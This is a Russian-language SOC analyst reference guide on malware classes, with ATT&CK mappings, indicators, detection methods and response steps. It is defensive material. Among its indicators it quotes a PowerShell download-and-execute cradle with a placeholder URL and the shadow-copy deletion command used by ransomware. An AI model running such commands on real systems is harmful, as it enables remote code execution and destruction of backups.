Security Operations Center

Анализ вредоносного ПО

Справочное руководство SOC-аналитика по классификации, обнаружению и реагированию на вредоносное программное обеспечение

Вредоносное программное обеспечение (malware) — это любой код, разработанный с целью нанести ущерб, получить несанкционированный доступ или нарушить работу системы. Понимание типов, механизмов работы и индикаторов компрометации каждого класса вредоносного ПО — ключевой навык SOC-аналитика для своевременного обнаружения и реагирования на инциденты.

🚪

BackdoorБэкдор — скрытый канал удалённого доступа к системе

MITRE ATT&CK T1059 — Command and Scripting Interpreter  ·  T1571 — Non-Standard Port

Описание

Принцип работы

Бэкдор оставляет на заражённом устройстве скрытый канал доступа, позволяя злоумышленнику подключаться к системе в обход штатных механизмов аутентификации. Типичный сценарий — открытие сетевого порта, подключённого к командной оболочке (bind shell), или установка обратного соединения к серверу атакующего (reverse shell).

Индикаторы компрометации (IoC)

Сетевые признаки

  • Открытие нестандартных сетевых портов (netstat -tlnp / ss -tlnp).
  • Исходящие соединения на нетипичные IP-адреса и порты (особенно высокие порты: 4444, 5555, 8080, 1337).
  • Периодические «heartbeat»-запросы к C2-серверу с регулярным интервалом.
  • DNS-запросы к подозрительным доменам (DGA-домены, свежезарегистрированные домены).

Признаки на хосте

  • Появление новых неизвестных процессов с сетевой активностью.
  • Изменения в планировщике задач (crontab, Task Scheduler) — добавление задач автозапуска.
  • Новые записи в реестре Windows: Run, RunOnce, Services.
  • Модификация системных файлов или конфигураций SSH (authorized_keys).

Как обнаружить

Методы детектирования

  • Мониторинг аномальных исходящих соединений с помощью SIEM/NDR (Sysmon Event ID 3 — Network Connection).
  • Сравнение списка открытых портов с эталоном (baseline).
  • Анализ автозагрузки: autoruns (Windows), systemctl list-unit-files (Linux).
  • Проверка целостности критичных файлов (AIDE, Tripwire, OSSEC).
Дополнение: Современные бэкдоры часто используют легитимные протоколы (HTTPS, DNS-over-HTTPS, WebSocket) для маскировки трафика. Обращайте внимание на аномальный объём DNS-запросов и зашифрованный трафик к неизвестным endpoint'ам.
🛡️ Реагирование:
  1. Изолируйте заражённый хост от сети (не выключайте — сохраните состояние памяти).
  2. Зафиксируйте C2-адрес (IP/домен) и заблокируйте его на периметре.
  3. Проверьте, какие команды были выполнены через бэкдор (bash_history, PowerShell Transcription, Sysmon).
  4. Проведите аудит других хостов на наличие аналогичных IoC — бэкдоры часто устанавливаются массово.
  5. Удалите механизмы персистентности (cron, реестр, authorized_keys) и проведите полное сканирование.
🕹️

RAT (Remote Access Trojan)Троян удалённого доступа — полнофункциональный инструмент скрытого управления системой

MITRE ATT&CK T1219 — Remote Access Software  ·  T1071 — Application Layer Protocol

Описание

Принцип работы

RAT предоставляет злоумышленнику полный контроль над устройством жертвы: управление файлами, запуск процессов, захват экрана и веб-камеры, запись звука, кейлоггинг. В отличие от простого бэкдора, RAT — это полнофункциональный инструмент удалённого администрирования с графическим или командным интерфейсом на стороне атакующего.

Известные семейства

DarkCometОдин из первых массовых RAT, создан в 2008 году. Поддерживает кейлоггинг, управление файлами, веб-камерой.
njRATШироко распространён на Ближнем Востоке. Компактный, с модульной архитектурой.
AsyncRATОткрытый исходный код. Часто используется в фишинговых кампаниях. Поддерживает плагины.
Cobalt Strike (Beacon)Коммерческий инструмент пентеста, активно используемый APT-группами как C2-фреймворк.

Индикаторы компрометации (IoC)

Сетевые и хостовые признаки

  • Периодические обращения к C2-серверу (beaconing) с фиксированным или jitter-интервалом.
  • Использование динамических DNS (No-IP, DuckDNS) для C2.
  • Создание скрытых задач автозапуска, мьютексов, записей в реестре.
  • Активность процессов с именами, маскирующимися под системные (svchost.exe, csrss.exe в нетипичных путях).
  • Аномальная активность веб-камеры, микрофона, снимки экрана.

Как обнаружить

Методы детектирования

  • JA3/JA3S-фингерпринты TLS-соединений к известным C2-фреймворкам.
  • Мониторинг beaconing-паттернов (ищите регулярные интервалы в сетевых логах).
  • Анализ DLL-загрузок процессов: reflective DLL injection, process hollowing (Sysmon Event ID 7, 10).
  • Проверка цифровых подписей исполняемых файлов.
  • YARA-правила для известных семейств RAT.
  • Sysmon Event ID 1 (создание процесса) — отслеживание запуска из нетипичных каталогов (%TEMP%, %APPDATA%).
Дополнение: Многие RAT используют технику «living off the land» (LOLBins) — запуск вредоносного кода через легитимные утилиты ОС (mshta.exe, certutil.exe, powershell.exe). Контролируйте запуск этих утилит через политики Sysmon и EDR.
🛡️ Реагирование:
  1. Изолируйте хост от сети. Не выключайте — снимите дамп памяти для анализа C2-протокола.
  2. Определите C2-инфраструктуру (IP, домены, JA3-хеши) и заблокируйте на уровне периметра.
  3. Оцените масштаб: какие данные атакующий мог получить (скриншоты, файлы, credentials).
  4. Проверьте другие хосты в сети на аналогичные IoC (beaconing, мьютексы, автозапуск).
  5. Смените credentials всех учётных записей, использовавшихся на заражённом хосте.
🔐

RansomwareПрограмма-вымогатель — шифрование и эксфильтрация данных с требованием выкупа

MITRE ATT&CK T1486 — Data Encrypted for Impact  ·  T1490 — Inhibit System Recovery  ·  T1567 — Exfiltration Over Web Service
⚠️ Критичность: Ransomware — одна из главных угроз последних лет. Современные группировки используют тактику «двойного вымогательства»: шифрование данных + угроза их публикации.

Описание

Принцип работы

Ransomware шифрует файлы на устройстве жертвы (и часто на доступных сетевых ресурсах), а затем требует выкуп за ключ расшифровки. Современные варианты предварительно эксфильтрируют данные на серверы атакующего, угрожая публичным раскрытием в случае неуплаты.

Известные семейства

LockBitОдна из самых активных RaaS-платформ. Быстрое шифрование, партнёрская программа. Инфраструктура нарушена в ходе операции Cronos (2024), но варианты продолжают появляться.
AkiraАктивен с 2023 года. Нацелен на корпоративные сети, эксплуатирует VPN-уязвимости (Cisco, Fortinet). Двойное вымогательство.
Cl0pИзвестен масштабными атаками через уязвимости в файлообменных платформах (MOVEit, GoAnywhere). Фокус на массовую эксфильтрацию.
PlayАктивен с 2022 года. Использует прерывистое шифрование (intermittent encryption) для ускорения процесса и обхода детекции.
Исторический контекст: WannaCry (2017, EternalBlue), Conti (преемник Ryuk, ликвидирован в 2022), BlackCat/ALPHV (Rust-based, exit scam в 2024) — важны для понимания эволюции ransomware, хотя уже неактивны.

Индикаторы компрометации (IoC)

Признаки на хосте

  • Массовое переименование файлов с добавлением нового расширения (.locked, .enc, .lockbit, .akira).
  • Появление файлов-записок (README.txt, DECRYPT_INSTRUCTIONS.html) в каждой директории.
  • Удаление теневых копий: vssadmin delete shadows /all /quiet (Sysmon Event ID 1).
  • Отключение Windows Defender и других защитных решений.
  • Резкий рост нагрузки на диск (массовое чтение/запись при шифровании).
  • Удаление файлов после шифрования (Sysmon Event ID 23 — FileDelete).

Сетевые признаки

  • Эксфильтрация больших объёмов данных перед шифрованием (выгрузка на облачные хранилища, Mega, Tor).
  • Горизонтальное перемещение по сети (SMB, WMI, PsExec, RDP).
  • Обращения к Tor-сайтам (оплата выкупа через .onion).

Как обнаружить

Методы детектирования

  • Мониторинг массовых файловых операций (EDR, Sysmon Event ID 11 — FileCreate).
  • Оповещения при удалении теневых копий (vssadmin, wmic shadowcopy).
  • Honeypot-файлы (canary files) в ключевых директориях — срабатывание при их изменении.
  • Мониторинг аномального сетевого трафика: массовые SMB-подключения, выгрузка данных.
  • Детекция известных IOC через Threat Intelligence платформы.
🛡️ Реагирование:
  1. Немедленно изолируйте заражённые хосты и сегменты сети — остановите распространение шифрования.
  2. Не выключайте машины: ключ шифрования может быть в оперативной памяти.
  3. Определите «нулевого пациента» (patient zero) и вектор проникновения (фишинг, VPN, RDP).
  4. Оцените масштаб эксфильтрации: проанализируйте сетевые логи на предмет массовой выгрузки данных.
  5. Проверьте наличие дешифратора на nomoreransom.org перед рассмотрением вопроса об оплате.
  6. Восстановление из бэкапов — убедитесь, что бэкапы не зашифрованы и не скомпрометированы.
  7. Эскалируйте инцидент руководству и юридической службе (Data Breach notification).
👻

RootkitРуткит — скрытие вредоносного присутствия на уровне ядра или пользователя

MITRE ATT&CK T1014 — Rootkit  ·  T1542 — Pre-OS Boot  ·  T1562.001 — Disable or Modify Tools

Описание

Принцип работы

Руткит — вредоносное ПО, получающее привилегированный доступ (root/SYSTEM) и скрывающее своё присутствие путём перехвата системных вызовов, модификации ядра ОС или манипуляции прошивкой. Руткиты прячут файлы, процессы, сетевые соединения и записи реестра от штатных средств мониторинга.

Типы руткитов

Руткиты уровня ядра (Kernel-mode) Модифицируют ядро ОС или загружают вредоносные драйверы. Наиболее опасные и сложные для обнаружения.
Руткиты уровня пользователя (User-mode) Перехватывают вызовы API в пространстве пользователя. Менее устойчивы, но проще в разработке.
Буткиты (Bootkit) Заражают загрузочный сектор (MBR/VBR/UEFI). Активируются до загрузки ОС, крайне сложны в обнаружении.
Firmware-руткиты Внедряются в прошивку устройств (BIOS/UEFI, сетевые карты). Выживают переустановку ОС и форматирование дисков.

Как обнаружить

Методы детектирования

  • Сравнение списка процессов из userspace (ps, tasklist) с данными из kernel-mode (кросс-верификация).
  • Проверка целостности ядра и модулей: chkrootkit, rkhunter (Linux), GMER (Windows).
  • Анализ загружённых драйверов: несигнированные модули, драйверы из нетипичных путей (Sysmon Event ID 6 — Driver Loaded).
  • Сканирование памяти с помощью Volatility Framework.
  • Верификация целостности UEFI/BIOS (Secure Boot, fwupd).
Дополнение: Если есть подозрение на руткит — не доверяйте результатам инструментов, запущенных из заражённой системы. Используйте загрузку с чистого носителя (Live CD/USB) для офлайн-анализа файловой системы и реестра.
🛡️ Реагирование:
  1. Изолируйте хост. Снимите дамп памяти и образ диска до каких-либо действий.
  2. Проведите офлайн-анализ с загрузкой с чистого носителя (Live CD/USB).
  3. Для kernel- и firmware-руткитов — рекомендуется полная переустановка ОС и обновление прошивки.
  4. Проверьте целостность Secure Boot, а также наличие несигнированных драйверов на других хостах сети.
  5. Эскалируйте инцидент — наличие руткита указывает на продвинутого противника (APT).
🧬

VirusВирус — самовоспроизводящееся вредоносное ПО, внедряющее код в другие файлы

MITRE ATT&CK T1204.002 — User Execution: Malicious File  ·  T1027 — Obfuscated Files or Information
Актуальность: Классические файловые вирусы — исторически первый тип вредоносного ПО. В современном ландшафте угроз (2024–2026) они встречаются значительно реже, чем ransomware, infostealers или fileless-атаки. Тем не менее, макро-вирусы и полиморфные варианты остаются актуальными векторами.

Описание

Принцип работы

Вирус — один из первых типов вредоносного ПО в истории (отсюда повсеместное использование слова «вирус» как синонима «malware» в обиходе). Ключевая особенность — способность к самовоспроизведению: вирус внедряет свой код в другие файлы на устройстве, обеспечивая персистентность и распространение.

Типы вирусов

Файловый вирус Заражает исполняемые файлы (.exe, .dll), внедряя свой код в тело файла.
Макро-вирус Распространяется через макросы в документах Office (Word, Excel). Активируется при открытии заражённого документа.
Полиморфный вирус Изменяет свой код при каждом заражении, затрудняя сигнатурное обнаружение.
Метаморфный вирус Полностью перезаписывает свой код при каждом заражении — наиболее сложный для обнаружения тип.

Индикаторы компрометации (IoC)

Признаки заражения

  • Изменение размера и хэш-сумм исполняемых файлов.
  • Неожиданные изменения дат модификации системных файлов.
  • Снижение производительности системы, частые сбои приложений.
  • Появление неизвестных процессов в диспетчере задач.
  • Антивирус обнаруживает заражённые файлы в нетипичных местах.

Как обнаружить

Методы детектирования

  • Сигнатурный анализ антивирусом (базовый метод, неэффективен для полиморфных).
  • Эвристический анализ: обнаружение подозрительного поведения (модификация файлов, инжекция кода).
  • Мониторинг целостности файлов (FIM) — срабатывание при изменении хэшей критичных файлов.
  • Песочницы (sandbox): запуск подозрительных файлов в изолированной среде.
Дополнение: Для анализа подозрительных файлов используйте VirusTotal, Any.Run, Hybrid Analysis. При расследовании — снимайте дамп памяти процесса и проверяйте строки (strings), импорты, секции PE-файла.
🛡️ Реагирование:
  1. Поместите заражённые файлы в карантин антивируса.
  2. Определите масштаб заражения: какие файлы и директории были модифицированы (FIM-отчёты).
  3. Восстановите заражённые файлы из чистых бэкапов.
  4. Проверьте вектор заражения: email-вложение, USB, сетевая шара — и закройте его.
  5. Обновите сигнатуры антивируса и запустите полное сканирование на всех хостах в сегменте.
🪱

WormЧервь — самораспространяющееся вредоносное ПО

MITRE ATT&CK T1210 — Exploitation of Remote Services  ·  T1021 — Remote Services  ·  T1570 — Lateral Tool Transfer

Описание

Принцип работы

В отличие от вирусов, черви распространяются самостоятельно — от заражённого устройства к другим — без необходимости «заражать» файлы. Они эксплуатируют сетевые уязвимости, слабые пароли и открытые сервисы. Яркий пример — WannaCry, червь, эксплуатировавший уязвимость MS17-010 (EternalBlue) и вызвавший глобальную эпидемию.

Механизмы распространения

Эксплуатация уязвимостейАвтоматическое сканирование и эксплуатация сетевых сервисов (SMB, RDP, SSH).
Email-рассылкаМассовая отправка заражённых вложений по адресной книге жертвы.
Съёмные носителиРаспространение через USB-накопители (autorun.inf).
Мессенджеры / соцсетиРассылка вредоносных ссылок через аккаунт жертвы.

Индикаторы компрометации (IoC)

Сетевые признаки

  • Массовое сканирование портов (445, 3389, 22) из внутренней сети (Sysmon Event ID 3 — массовые Network Connection).
  • Резкий рост сетевого трафика, особенно lateral movement.
  • Множественные неудачные попытки подключения к разным хостам.
  • Аномальная активность SMB/RPC на большом количестве машин.

Как обнаружить

Методы детектирования

  • IDS/IPS-правила для обнаружения эксплуатации известных уязвимостей (Suricata, Snort).
  • Мониторинг аномалий сетевого трафика: всплески на определённых портах.
  • Корреляция алертов: одна и та же сигнатура на множестве хостов за короткий промежуток.
  • Сегментация сети для ограничения распространения.
🛡️ Реагирование:
  1. Приоритет — сетевая изоляция заражённых сегментов, а не лечение отдельных хостов.
  2. Определите эксплуатируемую уязвимость и экстренно примените патч на незаражённых хостах.
  3. Заблокируйте протокол распространения на уровне ACL/файрвола (например, SMB port 445 между VLAN).
  4. Проведите массовое сканирование сети на IoC червя.
  5. После локализации — очистка хостов, восстановление из бэкапов, снятие изоляции поэтапно.
🤖

Botnet / LoaderБотнет и загрузчик — инфраструктура доставки и управления вредоносным ПО

MITRE ATT&CK T1104 — Multi-Stage Channels  ·  T1105 — Ingress Tool Transfer  ·  T1568 — Dynamic Resolution
⚠️ Критичность: Загрузчики-ботнеты — это «первый этап» большинства серьёзных атак. Обнаружение загрузчика на ранней стадии предотвращает доставку ransomware, infostealers и RAT.

Описание

Принцип работы

Loader (загрузчик) — вредоносное ПО, основная задача которого — доставить и запустить «нагрузку второго этапа» (second-stage payload): ransomware, RAT, infostealer. Botnet — сеть заражённых устройств, управляемых через C2-сервер. Многие загрузчики одновременно являются ботнетами, объединяя тысячи заражённых машин в управляемую инфраструктуру для доставки, спама и DDoS.

Известные семейства

EmotetИзначально банковский троян, эволюционировал в крупнейшую ботнет-платформу доставки. Распространяется через фишинг с вредоносными документами и URL. Неоднократно ликвидировался и возрождался.
QakBot (Qbot)Многоцелевой загрузчик: доставка Cobalt Strike, ransomware. Модульная архитектура, распространение через email-цепочки (reply-chain hijacking).
IcedID (BokBot)Загрузчик с функциями банковского трояна. Часто используется как промежуточный этап перед развёртыванием ransomware (Conti, BlackCat).
Pikabot / DarkGateЗагрузчики нового поколения (2023–2025), заполнившие нишу после ликвидации QakBot. Поддерживают модули: VNC, credential theft, reverse shell.

Индикаторы компрометации (IoC)

Признаки заражения

  • Фишинговое письмо с вредоносным вложением (.doc, .xls с макросами, .iso, .one, .lnk) или URL — вектор заражения.
  • Запуск дочерних процессов из Office-приложений: WINWORD.EXE → cmd.exe → powershell.exe (Sysmon Event ID 1).
  • Загрузка DLL через regsvr32.exe, rundll32.exe из %TEMP% или %APPDATA%.
  • Beaconing к C2-серверу — короткие HTTP/HTTPS-запросы с регулярным интервалом.
  • Загрузка дополнительных модулей и пейлоадов второго этапа.
  • Создание запланированных задач и записей реестра для персистентности.

Как обнаружить

Методы детектирования

  • Мониторинг цепочек родительских процессов: outlook.exe → WINWORD.EXE → cmd.exe — аномалия.
  • Sysmon Event ID 1 + Event ID 7: отслеживание запуска подозрительных DLL из временных каталогов.
  • Анализ email-вложений в песочнице до доставки пользователю (sandbox detonation).
  • JA3-фингерпринты и beaconing-анализ для обнаружения C2-коммуникаций.
  • Sigma/YARA-правила для известных загрузчиков.
  • Мониторинг обращений к DGA-доменам (Domain Generation Algorithms).
Дополнение: Загрузчики — наиболее «тихий» этап атаки. Между заражением загрузчиком и доставкой основной нагрузки может пройти от минут до недель. Обнаружение и ликвидация на этом этапе — самый эффективный способ предотвратить катастрофические последствия.
🛡️ Реагирование:
  1. Изолируйте хост от сети — загрузчик может в любой момент доставить ransomware.
  2. Заблокируйте C2-домены/IP на уровне DNS и файрвола.
  3. Определите фишинговое письмо-источник и удалите его из всех почтовых ящиков (email clawback).
  4. Проверьте, была ли доставлена нагрузка второго этапа (ransomware, RAT).
  5. Просканируйте всю организацию на IoC загрузчика — фишинговые кампании обычно массовые.
🔑

InfostealerИнфостилер — кража учётных данных, cookie, крипто-кошельков и конфиденциальных файлов

MITRE ATT&CK T1555 — Credentials from Password Stores  ·  T1539 — Steal Web Session Cookie  ·  T1005 — Data from Local System
⚠️ Критичность: Infostealers — одна из самых массовых угроз 2023–2026. Украденные credentials продаются на теневых маркетплейсах (Russian Market, Genesis) и используются для первичного доступа в корпоративные сети.

Описание

Принцип работы

Инфостилер — вредоносное ПО, автоматически собирающее ценные данные с устройства жертвы и отправляющее их на сервер атакующего. Основные цели: сохранённые пароли из браузеров (Chrome, Edge, Firefox), session cookies, данные автозаполнения и банковских карт, криптовалютные кошельки, токены Discord/Telegram, файлы конфигурации VPN/FTP/SSH. Весь процесс — от заражения до эксфильтрации — занимает от секунд до минут.

Известные семейства

Redline StealerMaaS-платформа (Malware-as-a-Service). Крадёт пароли, cookie, данные карт, крипто-кошельки. Один из самых распространённых стилеров.
Lumma StealerАктивен с 2022 года. Продаётся как MaaS, фокус на браузерные данные и криптовалюту. Частые обновления для обхода детекции.
Raccoon StealerMaaS-стилер с простым интерфейсом управления. Крадёт широкий спектр данных, включая скриншоты и файлы по маске.
VidarФорк Arkei Stealer. Модульная архитектура: кража браузерных данных, крипто-кошельков, 2FA-токенов, файлов по заданным расширениям.

Индикаторы компрометации (IoC)

Признаки заражения

  • Доступ процесса к файлам хранилища паролей браузера: Login Data, Cookies, Web Data (Chrome), logins.json (Firefox).
  • Обращение к каталогам крипто-кошельков: %APPDATA%\Exodus, %APPDATA%\Electrum, %APPDATA%\MetaMask.
  • Кратковременный процесс с интенсивной файловой активностью и последующей сетевой отправкой (HTTP POST, Telegram Bot API).
  • Запуск из %TEMP%, %APPDATA% с несигнированным бинарником.
  • Создание архива (ZIP) с собранными данными перед отправкой.

Как обнаружить

Методы детектирования

  • Sysmon Event ID 1: запуск несигнированных бинарников из %TEMP%, %APPDATA%, Downloads.
  • Sysmon Event ID 11 (FileCreate): создание архивов с предсказуемыми именами в temp-каталогах.
  • Мониторинг доступа к файлам хранилища паролей браузера процессами, не являющимися браузером.
  • Сетевой мониторинг: HTTP POST на подозрительные endpoint'ы или Telegram Bot API (api.telegram.org/bot).
  • YARA/Sigma-правила для известных семейств стилеров.
  • EDR-детекция credential access техник (DPAPI decryption, memory scraping).
Дополнение: Основные векторы доставки инфостилеров: вредоносная реклама (malvertising), поддельные сайты с «кряками» программ, фишинговые email, заражённые пакеты в менеджерах зависимостей (npm, PyPI). Обучение пользователей — первая линия обороны.
🛡️ Реагирование:
  1. Изолируйте хост. Определите, какие данные были похищены (браузерные пароли, cookie, крипто-кошельки, файлы).
  2. Немедленно инвалидируйте все сессии: сброс cookies всех корпоративных сервисов (SSO, VPN, email, облака).
  3. Принудительная смена паролей всех учётных записей, сохранённых в браузере на заражённом хосте.
  4. Проверьте, не использовались ли украденные credentials для доступа к корпоративным ресурсам (логи VPN, SSO, email).
  5. Отзовите API-токены и сессии Discord/Telegram/Slack, если они были скомпрометированы.
  6. Уведомите пользователя о необходимости смены паролей на личных сервисах (банки, соцсети).
🏦

Banking MalwareБанковский троян — кража финансовых данных и средств через перехват браузерных сессий

MITRE ATT&CK T1185 — Browser Session Hijacking  ·  T1557 — Adversary-in-the-Middle

Описание

Принцип работы

Банковские трояны нацелены на кражу финансовых данных: учётных записей интернет-банкинга, данных платёжных карт, криптовалютных кошельков. Используют техники перехвата форм (form grabbing), веб-инжектов (модификация содержимого банковских сайтов в браузере), MitB-атак (Man-in-the-Browser) и перехвата SMS для обхода 2FA.

Известные семейства

Zeus / Zbot«Прародитель» современных банковских троянов. Утёкший исходный код породил десятки вариантов (Citadel, GameOver Zeus).
TrickBotМодульный троян: банковские инжекты, кража учётных данных, lateral movement. Тесно связан с Conti ransomware.
DridexРаспространяется через макросы в документах. Фокус на корпоративный банкинг и wire-переводы.
GrandoreiroЛатиноамериканский банковский троян, с 2023 года активно атакующий европейские банки. Overlay-атаки для перехвата ввода.
Связь с Botnet/Loader: Emotet, ранее крупнейший банковский троян, эволюционировал в загрузчик-ботнет (см. секцию 07). Современные банковские трояны часто доставляются через загрузчики как «нагрузка второго этапа».

Индикаторы компрометации (IoC)

Признаки заражения

  • Инжекция вредоносного JS-кода в страницы банковских сайтов.
  • Перехват HTTPS-трафика через подмену сертификатов (MitB).
  • Перенаправление на фишинговые копии банковских сайтов.
  • Аномальная активность процессов браузера: загрузка неизвестных DLL (Sysmon Event ID 7).
  • Несанкционированные транзакции на банковских счетах.

Как обнаружить

Методы детектирования

  • Мониторинг загрузки подозрительных DLL в процессы браузеров (Sysmon Event ID 7).
  • Обнаружение веб-инжектов: сравнение DOM-дерева банковского сайта с эталоном.
  • Анализ сертификатов: обнаружение самоподписанных или аномальных CA в цепочке.
  • Мониторинг перехвата DNS для банковских доменов.
  • Фид TI (Threat Intelligence) с IOC известных банковских троянов.
🛡️ Реагирование:
  1. Изолируйте хост. Немедленно уведомите финансовый отдел и банк о возможной компрометации.
  2. Заблокируйте скомпрометированные банковские аккаунты и отзовите сессионные токены.
  3. Проверьте историю транзакций на наличие несанкционированных переводов.
  4. Снимите дамп памяти браузера для анализа веб-инжектов и перехваченных данных.
  5. Смените все финансовые credentials и включите аппаратный 2FA (FIDO2).
⌨️

KeyloggerКейлоггер — перехват нажатий клавиш

MITRE ATT&CK T1056.001 — Input Capture: Keylogging

Описание

Принцип работы

Кейлоггер записывает все нажатия клавиш на устройстве жертвы и отправляет собранные данные злоумышленнику. Это позволяет перехватывать пароли, сообщения, данные банковских карт и любую другую конфиденциальную информацию, вводимую с клавиатуры. Кейлоггеры могут быть как программными, так и аппаратными.

Типы кейлоггеров

Программные (API-based) Перехватывают нажатия через системные API: SetWindowsHookEx, GetAsyncKeyState в Windows.
Программные (Kernel-based) Работают на уровне драйвера клавиатуры. Сложнее обнаружить, перехватывают ввод до его обработки приложениями.
Аппаратные Физические устройства между клавиатурой и компьютером. Не обнаруживаются программными средствами — только физический осмотр.
Memory-injection Внедряют код в процессы браузера для перехвата ввода на определённых сайтах (form grabbing).

Индикаторы компрометации (IoC)

Признаки на хосте

  • Наличие скрытых файлов-логов с записями нажатий (.log, .txt в нетипичных каталогах).
  • Процессы, использующие API-вызовы перехвата клавиатуры (SetWindowsHookEx).
  • Периодическая отправка небольших файлов на внешние серверы (SMTP, FTP, HTTP POST).
  • Неизвестные задачи в автозагрузке с невнятными именами.

Как обнаружить

Методы детектирования

  • Мониторинг вызовов SetWindowsHookEx(WH_KEYBOARD_LL) через Sysmon или ETW.
  • Поиск подозрительных файлов в %TEMP%, %APPDATA% с постоянно растущим размером.
  • Анализ исходящего трафика: регулярные отправки на SMTP/FTP малого объёма (Sysmon Event ID 3).
  • EDR-решения с детекцией credential theft техник.
  • Физическая проверка портов USB (для аппаратных кейлоггеров).
Дополнение: Кейлоггеры часто входят в состав RAT или банковских троянов как один из модулей. Обнаружение кейлоггера должно стать поводом для расширенного расследования — за ним может скрываться более серьёзное заражение.
🛡️ Реагирование:
  1. Изолируйте хост. Определите, как давно кейлоггер был активен (дата создания лог-файлов, время установки).
  2. Считайте все пароли, введённые за период активности кейлоггера, скомпрометированными — смените их.
  3. Проверьте, куда отправлялись перехваченные данные (C2-адрес, SMTP, FTP, Telegram).
  4. Проведите расширенное расследование: кейлоггер часто является модулем RAT или инфостилера.
  5. При обнаружении аппаратного кейлоггера — задокументируйте, изымите устройство, привлеките службу физической безопасности.
📢

AdwareРекламное ПО — навязчивая реклама и подмена настроек

MITRE ATT&CK T1176 — Browser Extensions  ·  T1071 — Application Layer Protocol

Описание

Принцип работы

Adware часто распространяется в комплекте с бесплатным программным обеспечением и отображает нежелательную рекламу на устройстве. Хотя не всё рекламное ПО является вредоносным, некоторые образцы изменяют поисковую систему по умолчанию, перехватывают DNS-запросы, подменяют домашнюю страницу браузера и собирают данные о поведении пользователя.

Классификация по поведению

Безвредное (Nuisance) Показывает рекламные баннеры, не выполняет вредоносных действий. Легко удаляется.
Browser Hijacker Подменяет поисковую систему, домашнюю страницу, перенаправляет запросы. Устанавливает расширения.
Spyware-компонент Собирает историю просмотров, поисковые запросы, данные форм и передаёт третьим лицам.

Индикаторы компрометации (IoC)

Признаки заражения

  • Всплывающие рекламные окна, в том числе при закрытом браузере.
  • Изменение домашней страницы и поисковой системы без ведома пользователя.
  • Установка неизвестных расширений браузера.
  • Перенаправление поисковых запросов через сторонние сервисы.
  • Замедление работы браузера из-за обилия рекламных элементов.

Как обнаружить

Методы детектирования

  • Проверка установленных программ и расширений браузера на наличие неизвестных элементов.
  • Анализ DNS-запросов: обнаружение перенаправлений на рекламные сети.
  • Сканирование специализированными утилитами (AdwCleaner, Malwarebytes).
  • Мониторинг изменений настроек браузера (реестр, файлы конфигурации).
Дополнение: Некоторые adware-программы используются как вектор доставки более серьёзных угроз — загрузчики банковских троянов или инфостилеров могут маскироваться под «безобидное» рекламное ПО. Не стоит игнорировать adware-алерты.
🛡️ Реагирование:
  1. Удалите adware через специализированные утилиты (AdwCleaner, Malwarebytes) или вручную.
  2. Удалите неизвестные расширения браузера и сбросьте настройки браузера до значений по умолчанию.
  3. Проверьте, не установлено ли дополнительное вредоносное ПО — проведите полное сканирование.
  4. Определите источник установки (бандл с бесплатным ПО, вредоносная реклама) и заблокируйте его.
🧠

Fileless MalwareБесфайловое вредоносное ПО — атака без записи на диск

MITRE ATT&CK T1059.001 — PowerShell  ·  T1218 — System Binary Proxy Execution  ·  T1055 — Process Injection
⚠️ Критичность: бесфайловое вредоносное ПО крайне сложно обнаружить традиционными антивирусами, так как оно не создаёт файлов на диске и работает исключительно в оперативной памяти, реестре или через легитимные системные утилиты.

Описание

Принцип работы

Fileless malware — класс вредоносного ПО, которое не записывает исполняемые файлы на диск. Вместо этого оно использует легитимные инструменты операционной системы (PowerShell, WMI, mshta, regsvr32, certutil и др.) для выполнения вредоносного кода непосредственно в памяти. Это позволяет обходить сигнатурный анализ антивирусов, файловые сканеры и стандартные механизмы мониторинга файловой системы. Вредоносный код может храниться в реестре Windows, WMI-подписках, планировщике задач или передаваться напрямую из сети.

Типы

Memory-only (только в памяти) Вредоносный код загружается и выполняется исключительно в оперативной памяти процесса. После перезагрузки системы исчезает, если не имеет механизма персистентности.
Script-based (на основе скриптов) Использует встроенные скриптовые движки ОС: PowerShell, VBScript, JScript, макросы Office. Скрипт может быть закодирован в base64 и передан как аргумент командной строки.
LOLBins (Living off the Land) Эксплуатация легитимных системных утилит (mshta.exe, certutil.exe, rundll32.exe, regsvr32.exe, wmic.exe) для загрузки и выполнения вредоносного кода.
Registry-resident (в реестре) Вредоносный пейлоад сохраняется в значениях ключей реестра Windows и извлекается/выполняется при каждом входе в систему или по расписанию.

Техники выполнения

Распространённые методы

  • PowerShell cradle: загрузка и выполнение кода из сети прямо в памяти — IEX (New-Object Net.WebClient).DownloadString('http://...').
  • Reflective DLL Injection: загрузка DLL непосредственно в память процесса без использования стандартного API LoadLibrary, минуя мониторинг файловой системы.
  • Process Hollowing: создание легитимного процесса в приостановленном состоянии, замена его кода на вредоносный и возобновление выполнения.
  • WMI Event Subscription: создание постоянных WMI-подписок на события для выполнения вредоносных скриптов при определённых условиях (логон, таймер).
  • .NET In-Memory Execution: загрузка и выполнение .NET-сборок (Assembly.Load) непосредственно в памяти без сохранения на диск.

Индикаторы компрометации (IoC)

Признаки на хосте

  • Аномальные запуски PowerShell с параметрами -EncodedCommand, -NoProfile, -WindowStyle Hidden, -ExecutionPolicy Bypass.
  • Выполнение wmic.exe, mshta.exe, certutil.exe, regsvr32.exe с сетевыми аргументами или нестандартными параметрами.
  • Создание WMI-подписок на события (__EventFilter, __EventConsumer, __FilterToConsumerBinding).
  • Подозрительные значения в ключах реестра автозагрузки, содержащие base64-строки или PowerShell-команды.
  • Процесс powershell.exe или cmd.exe с аномально высоким потреблением памяти и сетевой активностью.
  • Инжекция кода в легитимные процессы: explorer.exe, svchost.exe, notepad.exe с неожиданными сетевыми соединениями.

Сетевые признаки

  • Исходящие соединения от процессов powershell.exe, wscript.exe, mshta.exe к внешним IP.
  • Загрузка скриптов или пейлоадов по HTTP/HTTPS (PowerShell cradle).
  • Обращения к известным C2-фреймворкам: Cobalt Strike, Sliver, Havoc, Mythic.
  • DNS-запросы к DGA-доменам или подозрительным свежезарегистрированным доменам.

Как обнаружить

Техники обнаружения

  • Sysmon: Event ID 1 (создание процесса с командной строкой), Event ID 7 (загрузка модулей), Event ID 10 (доступ к процессу — инжекция), Event ID 19–21 (WMI-события).
  • PowerShell Logging: включение Script Block Logging (Event ID 4104), Module Logging и Transcription для записи всех выполняемых PowerShell-скриптов.
  • Windows Event Log: Event ID 4688 (создание процесса с аудитом командной строки), Event ID 4697 (установка служб).
  • AMSI (Antimalware Scan Interface): перехватывает и сканирует скрипты перед выполнением (PowerShell, VBScript, JScript, .NET). Эффективен даже против обфусцированного кода.
  • EDR-решения: мониторинг поведения процессов, обнаружение инжекций, reflective loading, аномальных цепочек родительских процессов.
